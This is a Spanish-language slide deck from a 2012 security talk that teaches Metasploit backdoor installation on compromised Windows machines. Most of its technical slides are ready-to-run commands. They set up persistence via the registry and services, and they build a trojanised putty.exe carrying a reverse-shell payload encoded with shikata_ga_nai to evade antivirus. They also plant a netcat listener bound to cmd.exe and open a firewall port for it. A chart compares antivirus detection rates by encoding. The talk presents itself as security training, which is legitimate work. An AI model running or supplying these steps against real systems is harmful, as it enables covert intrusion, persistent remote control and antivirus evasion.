Técnicas de instalación de Backdoors

Anuncio
Linux Week 2012
Dejando la puerta abierta: Making Metasploit
Backdoors
13 de Marzo, 2012
Omar Palomino
omarc320@gmail.com
http://www.el-palomo.com
• Ing. Sistemas y Maestrista de Ing. de
Computación y Sistemas, CEH,
Security+.
• Administrador de seguridad de
información para La Positiva Vida.
• Consultor en seguridad de información.
• “10 años” de experiencia en seguridad
de información
• Psicólogo que aun no comienza sus
estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com
http://www.el-palomo.com

El objetivo principal de este videotutorial es identificar y promover el
uso de herramientas Open Source en el ámbito de seguridad de
información, a través del uso del Sistema Operativo Bactrack Linux
para la explotación de vulnerabilidades y manteniendo de acceso por
medio de backdoors en el sistema vulnerado.

Los objetivos específicos son:
 Identificar los diferentes mecanismos de creación de puertas
traseras (backdoors) que permitan el ingreso automatizo a los
equipos vulnerados.
 Mostrar los diversos mecanismos para evadir la detección de
backdoors a través de técnicas de encoding.
 Realizar pruebas de mantenimiento de acceso tras el reinicio del
Sistema Operativo.
http://www.el-palomo.com
Explotación de la
vulnerabilidad
Explicación de las
técnicas de
creación de
backdoors
Técnicas de evasión
de antivirus
(encoding)
Pruebas finales y
conclusiones
TÉCNICAS DE CREACIÓN DE BACKDOORS
Técnicas de
instalación de
Backdoors
Modificación del
sistema de registros
(REGEDIT)
RUN PERSISTENCE
1
Instalación de
ejecutables como
servicio en el S.O
RUN METSVC
2
http://www.el-palomo.com
TÉCNICAS DE CREACIÓN DE BACKDOORS
Modificación del sistema de
registros (REGEDIT)
RUN
PERSISTENCE
Instalación de ejecutables
como servicio en el S.O
RUN METSVC
1
Técnicas de instalación de
Backdoors
• COMANDOS:
Meterpreter> run persistence -h
Meterpreter> run persistence –A –L C:\\ -X –i 10 –p 443 –r <dirección IP BT>
Meterpreter> reboot
Meterpreter> resource <ruta para desinstalación de backdoor>
http://www.el-palomo.com
TÉCNICAS DE CREACIÓN DE BACKDOORS
Modificación del sistema de
registros (REGEDIT)
RUN PERSISTENCE
Instalación de ejecutables
como servicio en el S.O
RUN
METSVC
Técnicas de instalación de
Backdoors
• COMANDOS:
Meterpreter> run metsvc –h
Meterpreter> run metsvc –A
Meterpreter> use exploit/multi/handler
Meterpreter> set payload windows/metsvc_bind_tcp
Meterpreter> show options
Meterpreter> exploit
Meterpreter> run metsvc -r
http://www.el-palomo.com
2
Explotación de la
vulnerabilidad
Explicación de las
técnicas de
creación de
backdoors
Técnicas de evasión
de antivirus
(encoding)
Pruebas finales y
conclusiones
TÉCNICAS DE EVASIÓN DE ANTIVIRUS
Técnicas de
evasión de
ANTIVIRUS
ENCODING:
SHIKATA_GA_NAI
MSFENCONDE
3
Instalación NETCAT
REGEDIT
4
http://www.el-palomo.com
TÉCNICAS DE EVASIÓN DE ANTIVIRUS
ENCODING:
SHIKATA_GA_NAI
MSFENCONDE
Instalación NETCAT
REGEDIT
3
Técnicas de evasión de
ANTIVIRUS
• COMANDOS:
1.- Descargar putty.exe
2.- Crear payload codificado:
Root# msfpayload windows/meterpreter/reverse_tcp LHOST=<IP BT> R| msfencode –t exe –x putty.exe –
k –o puttybd.exe –e x86/shikata_ga_nai –c 5
Meterpreter> use exploit/multi/handler
Meterpreter> set payload windows/meterpreter/reverse_tcp
Meterpreter> set LHOST
Meterpreter> set LPORT
Meterpreter> exploit
http://www.el-palomo.com
DETECCIÓN DE ANTIVIRUS
45
43
Total de antivirus
40
32
35
Sin encoding
30
24
25
Encoding Shikata Ga Nai
23
23
22
19
20
Encoding Shikata Ga Nai + UPX
Encoding Shikata Ga Nai +
Countdown
15
10
Encoding Shikata Ga Nai +
Countdown + UPX
5
Encoding Shikata Ga Nai +
Countdown + call4_dword_xor
0
Total de
antivirus
Sin encoding
Encoding
Shikata Ga Nai
Encoding
Encoding
Encoding
Encoding
Shikata Ga Nai + Shikata Ga Nai + Shikata Ga Nai + Shikata Ga Nai +
UPX
Countdown
Countdown +
Countdown +
UPX
call4_dword_xor
http://www.el-palomo.com
TÉCNICAS DE EVASIÓN DE ANTIVIRUS
ENCODING:
SHIKATA_GA_NAI
MSFENCONDE
Instalación NETCAT
REGEDIT
Técnicas de evasión de
ANTIVIRUS
4
• COMANDOS:
1.- Descargar NETCAT para windows
2.- Modificar registro:
Meterpreter> upload nc.exe C:\\Windows\\system32\\
Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe Ldp 455 -e cmd.exe'
Meterpreter> execute -f cmd -i
Meterpreter> netsh firewall show portopening
Meterpreter> netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
3.- Conexión al cliente
ROOT# nc -v <IP_VICTIMA> 455
http://www.el-palomo.com
 Sistema Operativo Bactrack GNU Linux contiene la mejor suite de herramientas
de auditoría de seguridad de información para construir puertas traseras.
 Las puertas traseras construidas con Metasploit funcionan correctamente en
sistemas operativos sin antivirus y sin firewall interno (no funcionan en caso
contrario).
 Shikata ga nai es una técnica de codificación que permite evadir más del 50%
de antivirus del mercado.
 Las técnicas de codificación no logran evadir todos los antivirus del mercado.
 Se utilizaron técnicas de modificación de registros y configuración manual del
firewall para instalar puertas traseras que funcionen correctamente en
sistemas con antivirus y firewall activos.
http://www.el-palomo.com
Linux Week 2012
Dejando la puerta abierta: Making Metasploit
Backdoors
13 de Marzo, 2012
Omar Palomino
omarc320@gmail.com
http://www.el-palomo.com
Descargar